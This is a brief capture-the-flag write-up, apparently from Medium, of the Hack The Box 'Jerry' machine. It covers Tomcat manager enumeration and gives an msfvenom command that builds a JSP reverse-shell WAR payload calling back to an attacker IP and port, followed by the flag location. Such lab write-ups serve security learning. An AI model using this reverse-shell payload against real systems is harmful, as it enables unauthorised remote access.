Hack The Box Jerry Write-Up

Enumeration

Nmap
Apache Tomcat/7.0.88
Basic access authentication
403 Acess Denied
Tomcat Web Application Manager

Exploitation

We can use msfvenom to generate a java payload for reverse shell with .war extension

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f war > cmd.war
C:\Users\Administrator\Desktop\flags
type "2 for the price of 1.txt"

--

--

Self-learner |Bug Hunter|

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store